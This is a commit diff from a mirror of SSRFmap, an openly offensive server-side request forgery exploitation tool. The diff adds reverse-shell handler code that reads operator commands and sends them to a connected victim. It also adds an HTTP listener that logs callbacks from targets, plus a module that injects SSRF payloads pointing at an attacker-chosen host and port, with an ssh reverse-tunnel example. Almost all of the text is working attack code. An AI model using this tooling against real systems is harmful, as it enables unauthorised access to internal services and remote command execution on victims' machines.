swisskyrepo
/
SSRFmap
mirror of https://github.com/swisskyrepo/SSRFmap.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #24 from xyzkab/add_handlers 

Add specified handlers
pull/25/head
Swissky 2020-01-09 10:54:03 +01:00 committed by GitHub
parent 8aac206bae 2ffa7985b9
commit bb0fe7d9dd
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
5 changed files with 123 additions and 14 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

9
core/handler.py
View File

@ -26,6 +26,15 @@ class Handler(threading.Thread):
print("\n{}\nShell > $ ".format(response.decode('utf_8', 'ignore').strip()), end='')
response = self.client.recv(255)
def listen_command(self):
if self.connected == True:
cmd = input("Shell> $ ")
if cmd == "exit":
self.kill()
print("BYE !")
exit()
self.send_command(cmd+"\n\n")
def send_command(self, cmd):
self.client.sendall(cmd.encode())

33
core/ssrf.py
View File

@ -7,6 +7,7 @@ import logging
class SSRF(object):
modules = set()
handler = None
requester = None
def __init__(self, args):
@ -15,10 +16,14 @@ class SSRF(object):
self.load_modules()
# Start a reverse shell handler
if args.handler:
handler = Handler(args.handler)
if args.handler and args.lport and args.handler == "1":
handler = Handler(args.lport)
handler.start()
elif args.handler and args.lport:
self.load_handler(args.handler)
handler = self.handler.exploit(args.lport)
handler.start()
# Init a requester
self.requester = Requester(args.reqfile, args.useragent, args.ssl)
@ -40,19 +45,21 @@ class SSRF(object):
# Handling a shell
while args.handler:
if handler.connected == True:
cmd = input("Shell> $ ")
if cmd == "exit":
handler.kill()
print("BYE !")
exit()
handler.send_command(cmd+"\n\n")
else:
time.sleep(5)
handler.listen_command()
time.sleep(5)
def load_modules(self):
for index,name in enumerate(os.listdir("./modules")):
location = os.path.join("./modules", name)
if ".py" in location:
mymodule = SourceFileLoader(name, location).load_module()
self.modules.add(mymodule)
self.modules.add(mymodule)
def load_handler(self, name):
handler_file = "{}.py".format(name)
try:
location = os.path.join("./handlers", handler_file)
self.handler = SourceFileLoader(handler_file, location).load_module()
except Exception as e:
logging.error("Invalid no such handler: {}".format(name))
exit(1)

50
handlers/http.py Normal file
View File

@ -0,0 +1,50 @@
from core.utils import *
from core.handler import Handler
import re
import logging
import urllib.parse
class exploit(Handler):
def __init__(self, port):
super().__init__(port)
def run(self):
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.socket.bind(('', self.port))
self.injected_params = []
while True:
self.socket.listen(5)
self.client, address = self.socket.accept()
response = self.client.recv(1024).decode()
if self.socket._closed or not response:
break
logging.info("New session from : \033[32m{}\033[0m".format( address[0] ))
self.connected = True
regex = re.compile('(.*) (.*) HTTP')
request_method, request_action = regex.findall(response)[0]
request_param = urllib.parse.urlsplit(request_action).query
logging.info("Possible injected param: \033[32m{}\033[0m".format( request_param ))
self.injected_params.append(request_param)
response_header = "HTTP/1.1 200 OK\n"
response_header += 'Server: I-See-You\n'
response_header += 'Connection: close\n\n'
self.client.send(response_header.encode())
self.client.close()
def kill(self):
socket.socket(socket.AF_INET, socket.SOCK_STREAM).connect(self.socket.getsockname()) # trigger last connection to closing
self.socket.close()
def listen_command(self):
# shutdown handler
if not self.socket._closed:
self.kill()
else:
exit()

43
modules/httpcollaborator.py Normal file
View File

@ -0,0 +1,43 @@
from core.utils import *
from core.handler import Handler
import re
import logging
import urllib.parse
"""
Example:
```
~$ python3 ssrfmap.py -v -r data/request.txt -p url,path --lhost=public-ip --lport 4242 -m httpcollaborator -l http
```
Use ssh/autossh to established remote tunnel between public and localhost handler if running module locally against remote target
```
~$ ssh -fN -R public-ip:4242:127.0.0.1:4242 username@public-ip
```
"""
name = "httpcollaborator"
description = "This module act like burpsuite collaborator through http protocol to detect if target parameters are prone to ssrf"
author = "xyzkab"
documentation = []
class exploit():
SERVER_HOST = "127.0.0.1"
SERVER_PORT = "4242"
def __init__(self, requester, args):
logging.info("Module '{}' launched !".format(name))
# Handle args for httpcollaborator
if args.lhost == None: self.SERVER_HOST = input("Server Host:")
else: self.SERVER_HOST = args.lhost
if args.lport == None: self.SERVER_PORT = input("Server Port:")
else: self.SERVER_PORT = args.lport
params = args.param.split(",")
for param in params:
logging.info("Testing PARAM: {}".format(param))
payload = wrapper_http("?{}".format(param), args.lhost, args.lport.strip() )
r = requester.do_request(param, payload)
logging.info("Module '{}' finished !".format(name))

2
ssrfmap.py
View File

@ -28,7 +28,7 @@ def parse_args():
parser.add_argument('-r', action ='store', dest='reqfile', help="SSRF Request file")
parser.add_argument('-p', action ='store', dest='param', help="SSRF Parameter to target")
parser.add_argument('-m', action ='store', dest='modules', help="SSRF Modules to enable")
parser.add_argument('-l', action ='store', dest='handler', help="Start an handler for a reverse shell")
parser.add_argument('-l', action ='store', dest='handler', help="Start an handler for a reverse shell", nargs='?', const='1')
parser.add_argument('-v', action ='store', dest='verbose', help="Enable verbosity", nargs='?', const=True)
parser.add_argument('--lhost', action ='store', dest='lhost', help="LHOST reverse shell")
parser.add_argument('--lport', action ='store', dest='lport', help="LPORT reverse shell")